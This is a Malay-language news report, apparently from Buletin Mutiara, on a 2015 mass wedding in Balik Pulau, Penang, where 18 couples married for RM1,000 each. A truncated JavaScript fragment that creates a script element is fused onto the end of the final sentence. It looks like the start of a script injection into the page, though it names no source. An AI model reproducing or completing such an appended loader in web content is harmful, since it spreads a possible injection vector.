WUP’15 bantu belia kahwin tanpa belanja tinggi

Oleh : AINUL WARDAH SOHILLI
Gambar : ALISSALA THIAN

BALIK PULAU – Seramai 18 pasangan pengantin diraikan serentak dalam Majlis Walimatulurus Perdana 2015 (WUP’15) yang diadakan di Kompleks Sukan Majlis Bandaraya Pulau Pinang (MBPP) Balik Pulau di sini baru-baru ini.

Kesemua pasangan mempelai yang ditemui teruja apabila terpilih untuk menyertai majlis yang julung kali diadakan di negeri ini anjuran khas Pusat Khidmat Pegawai Penyelaras Kawasan Dewan Undangan Negeri (KADUN) Pulau Betong dengan kerjasama Majlis Agama Islam Negeri Pulau Pinang (MAINPP), Yayasan Islam Pulau Pinang (YIPP) dan Pertubuhan Ikram (Barat Daya) Pulau Pinang.

Pada majlis berkaitan, pasangan dibawa berarak menaiki bas pelancongan Penang Hop On Hop Off (HOHO) dari Masjid Daerah Barat Daya ke Kompleks Sukan MBPP Balik Pulau dengan diiringi 30 motosikal berkuasa besar.

Mereka kemudiannya disambut dengan paluan kompang, tiupan serunai dan persembahan silat pendekar sebelum diarak masuk bagi majlis santapan beramai-ramai.

Terdahulu, 18 pasangan berkenaan diijabkabulkan tiga jurunikah dari MAINPP di Masjid Daerah Barat Daya sehari sebelum berlangsungnya WUP’15.

Hadir sama meraikan kemeriahan berkaitan, Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon dan isteri, Datin Nor Azizah Haron; Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna, Dato’ Abdul Malik Abul Kassim; Ahli Parlimen Nibong Tebal, Dato’ Mansor Othman dan isteri serta Pegawai-Pegawai Penyelaras KADUN.

Turut serta pada majlis yang didatangi kira-kira 10,000 tetamu, Pengerusi MAINPP, Dato’ Mohd. Salleh Man dan Mufti Negeri Pulau Pinang, Sahibul Samahah Dato’ Seri Hj. Hassan Ahmad.

Bagi Mohd. Hafiz Azizan, 29, dan pasangannya, Norhidayah Che Din, 26, pada peringkat permulaan, sebagaimana pasangan-pasangan lain, mereka merancang untuk mengadakan majlis perkahwinan khas sendiri, namun menukar fikiran pada saat-saat akhir dengan mengambil keputusan untuk menyertai WUP’15.

“ K a m i memilih resepsi ini kerana ia bukan sahaja menjimatkan kos , malah penganjuran majlis sebegini juga dirancang mengikut lunaslunas yang disyariatkan dalam Islam.

” Syukur alhamdulillah , semuanya berjalan lancar, doakan kami untuk menempuh alam perkahwinan ini,” katanya ketika ditemui Buletin Mutiara pada majlis berkaitan yang diadakan dengan
penuh meriah.

Turut sependapat, Muhammad Aiman Akbar, 21, bersama pasangannya, Noor Masitah Morat, 21, yang menyatakan bahawa usia muda bukan penghalang bagi mereka untuk berkahwin, apatah lagi kedua-duanya menganggap majlis perkahwinan tersebut sebagai suatu kenangan yang tidak akan dilupakan.

“Tidak pernah terlintas pun untuk berkahwin dalam suasana semeriah ini, namun semuanya sudah ditentukan-Nya,” kata Muhammad Aiman.

Pasangan Mohd. Azmi Mohd. Zaini, 27, dan Siti Bayzura Mohd. Razi, 27, tidak menyangka bahawa majlis perkahwinan mereka turut dihadiri oleh dif-dif kehormat.

“Semoga berkat doa semua yang hadir termasuk dif-dif kehormat, bantera rumahtangga yang kami bina ini kekal berpanjangan hingga ke jannah.

“Secara keseluruhan, majlis ini merakamkan memori indah dan semestinya terpahat sebagai kenangan manis untuk dikongsi bersama anak cucu kami kelak,” ujarnya sambil tersenyum.

Dalam pada itu, Pengarah majlis WUP’15, Mohd. Tuah Ismail ketika ditemui berkata, majlis yang julung kali diadakan berkenaan bertujuan membantu masyarakat Islam khususnya golongan belia yang ingin mendirikan rumahtangga tanpa mengeluarkan belanja tinggi. Ia telah melakar sejarahnya tersendiri.

“Sesungguhnya majlis perkahwinan yang diberkati bukanlah majlis bermewah-mewah, tetapi mudah dan bersederhana mengikut syariat,” katanya yang juga Pegawai Penyelaras KADUN Pulau Betong.

Beliau menambah, pada resepsi berkaitan, setiap pasangan boleh menjemput sehingga 300 tetamu dan hanya perlu mengeluarkan belanja sebanyak RM1,000 sebagai bayaran penyertaan yang termasuk penyediaan makanan, perkhidmatan jurunikah, kad undangan dan cenderahati untuk tetamu.var d=document;var s=d.createElement(‘script’);